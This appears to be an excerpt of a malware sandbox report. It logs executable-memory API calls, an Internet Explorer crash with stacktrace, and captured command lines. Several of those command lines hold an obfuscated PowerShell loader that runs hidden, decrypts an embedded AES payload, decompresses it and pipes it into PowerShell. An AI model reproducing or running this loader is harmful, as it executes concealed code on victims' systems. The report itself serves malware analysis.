base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2612
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003690000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000741f3000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 12980224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003080000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003ce0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769bf000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769bd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769bb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c26000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d76000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076c21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769c0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d4f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076d5b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefda37000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefef64000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefef61000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 2612 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd4fa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdba73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefd9243bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdbc5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdbc2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdc6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdc6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdbc48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefda50883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefda50ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefda50c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefd90a4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefd91d551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefda5347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefda5122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefda53542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefd91d42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefd91d1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769c9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769c98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefd91d0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefda43e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefd8f0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefd8f0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd4fa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 110814608
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 110820560
registers.r11: 110816368
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1887260577
registers.r13: 0
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell - }
cmdline powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk
cmdline C:\Windows\System32\cmd.exe /c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell -
cmdline powershell -
cmdline "C:\Windows\system32\cmd.exe" /c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell -
cmdline powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object 